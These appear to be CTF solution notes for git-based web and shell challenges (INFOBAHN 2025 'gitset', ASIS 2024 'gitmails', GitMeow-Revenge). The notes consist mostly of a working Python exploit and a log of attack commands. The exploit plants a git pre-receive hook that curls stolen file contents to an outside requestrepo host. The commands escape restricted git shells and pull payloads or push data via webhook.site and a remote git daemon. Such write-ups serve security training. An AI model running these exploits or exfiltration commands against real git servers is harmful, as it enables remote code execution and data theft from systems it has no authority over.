GIT CGI Exploit
| Event Name | INFOBAHN CTF 2025 |
| GitHub URL | - |
| Challenge Name | gitset |
Attachments
References
solution
gitset
Use git-init /tmp/... to initialize a git repo
You can create pre-receive hooks using git-apply --unsafe-paths since it will allows writing files inside .git
Finally trigger rce using a valid git-receive-pack payload
import requests, random, sys
URL = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:6969"
GIT = f"/tmp/bitset{random.random()}"
# Create {GIT}
s = requests.Session()
s.get(f"{URL}/cgi-bin/git-init?{GIT}")
# Write to {GIT}/hooks/pre-receive
add = f"""
diff --git a/..{GIT}/.git/hooks/pre-receive b/..{GIT}/.git/hooks/pre-receive
new file mode 100755
--- /dev/null
+++ b/..{GIT}/.git/hooks/pre-receive
@@ -0,0 +1,2 @@
+#!/bin/sh
+curl lp2drty9.requestrepo.com/?`cat /flag*`
"""
# We need --unsafe-paths otherwise it would refuse to write to .git/
try:
s.post(f"{URL}/cgi-bin/git-apply?--unsafe-paths", data=add, timeout=2)
except:
print("done")
# We need a valid pkt-line stream twice
for _ in range(2):
pl = f'{"0"*40} {"0"*40} refs/heads/x\0report-status\n'
pkt = f"{len(pl)+4:04x}" + pl + "0000"
print(pkt)
s.post(f"{URL}/cgi-bin/git-receive-pack?{GIT}", data=pkt)Gitmails challenge
ASIS CTF 2024
git log to rce using textconv
solver
ASIS CTF Final 2024 - gitmails (web)
git log trigger fsmonitor? I thought it does not. Then saw your comments and tried and it worked. And I just realized that it was my shell (zsh) prompt running git status, not git log.0xl4ught 2024 ## GitMeow-Revenge
git --git-dir=/tmp --work-tree=/tmp init
git --git-dir=/tmp --work-tree=/tmp add --all
git --git-dir=/tmp --work-tree=/tmp grep -o 0x...........................
git -C /tmp init
git -C /tmp add --all
git -C /tmp commit -m add
git -C /tmp branch -M main
git -C /tmp remote add origin git://108.137.34.7/
git -C /tmp push -u origin main
git init
echo -e '#!/bin/sh\nsh' > git-sh
git add --all
git commit -m x
git daemon --verbose --export-all --base-path=.git --reuseaddr --strict-paths .git/ --enable=receive-pack
git clone git://108.137.34.7/ x
git --exec-path=/home/challenger/x sh
git -C /usr/bin/ init
git --
git --exec-path=/usr/bin shell
git config --global core.pager cat
ls /usr/libexec/git-core
git init
git add --all
git commit -m 0
git config --global core.pager sh
git log -s --no-decorate --no-notes --no-expand-tabs --no-indent-heuristic --no-color --line-prefix=ls
git -C /tmp/ init
git -C /tmp/ add --all
git -C /tmp/ commit -m x
git -C /tmp/ show -If4
git show --name-only
git log -n7
git ls-remote --upload-pack=wget webhook.site/uniq_id
git ls-remote --upload-pack=sh uniq_id
add /
commit
log